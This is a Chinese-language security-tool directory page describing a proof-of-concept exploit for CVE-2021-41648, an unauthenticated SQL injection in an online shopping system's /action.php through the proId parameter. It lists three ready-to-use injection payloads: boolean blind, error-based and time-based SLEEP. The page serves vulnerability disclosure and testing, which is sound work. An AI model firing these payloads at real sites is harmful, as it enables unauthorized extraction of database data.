Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-41648 — 针对在线购物系统中通过proId参数进行的未认证SQL注入的概念验证漏洞利用,能够从MySQL数据库中提取数据。 | Kitploit
工具/GitHubGitHub/mobiusbinary/cve-2021-41648
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubmobiusbinary/cve-2021-41648

CVE-2021-41648

针对在线购物系统中通过proId参数进行的未认证SQL注入的概念验证漏洞利用,能够从MySQL数据库中提取数据。

查看仓库
4年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-41648

CVE-2021-41648 在线购物系统中的SQL注入漏洞

该在线购物系统容易受到未经身份验证的基于错误/布尔盲注以及基于错误的SQL注入攻击。

/action.php页面上的proId参数未对用户输入进行过滤,攻击者可以从底层MySQL数据库中提取敏感数据。

应用程序链接

online-shopping-system

受影响的组件及参数

URL: /action.php
参数: proId

POC

SQLMAP 载荷

/action.php 页面上的 proId 参数

参数: proId (POST) 类型: 基于布尔的盲注 标题: OR 布尔盲注 - WHERE 或 HAVING 子句 (NOT - MySQL 注释) 载荷: proId=61 OR 17-7=10' OR NOT 4774=4774#&addToCart=1

类型: 基于错误 标题: MySQL >= 5.0 OR 错误注入 - WHERE, HAVING, ORDER BY 或 GROUP BY 子句 (FLOOR) 载荷: proId=61 OR 17-7=10' OR (SELECT 6869 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6869=6869,1))),0x716a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gfTu&addToCart=1

类型: 基于时间的盲注 标题: MySQL >= 5.0.12 AND 时间盲注 (查询 SLEEP) 载荷: proId=61 OR 17-7=10' AND (SELECT 2990 FROM (SELECT(SLEEP(5)))YhWy)-- xWNo&addToCart=1

如果 POC 图片不清晰,请点击下方 GIF 以加载更高分辨率。

POC - proId

发现者

Jason Colyvas
MOBIUSBINARY
2021年9月21日

下载工具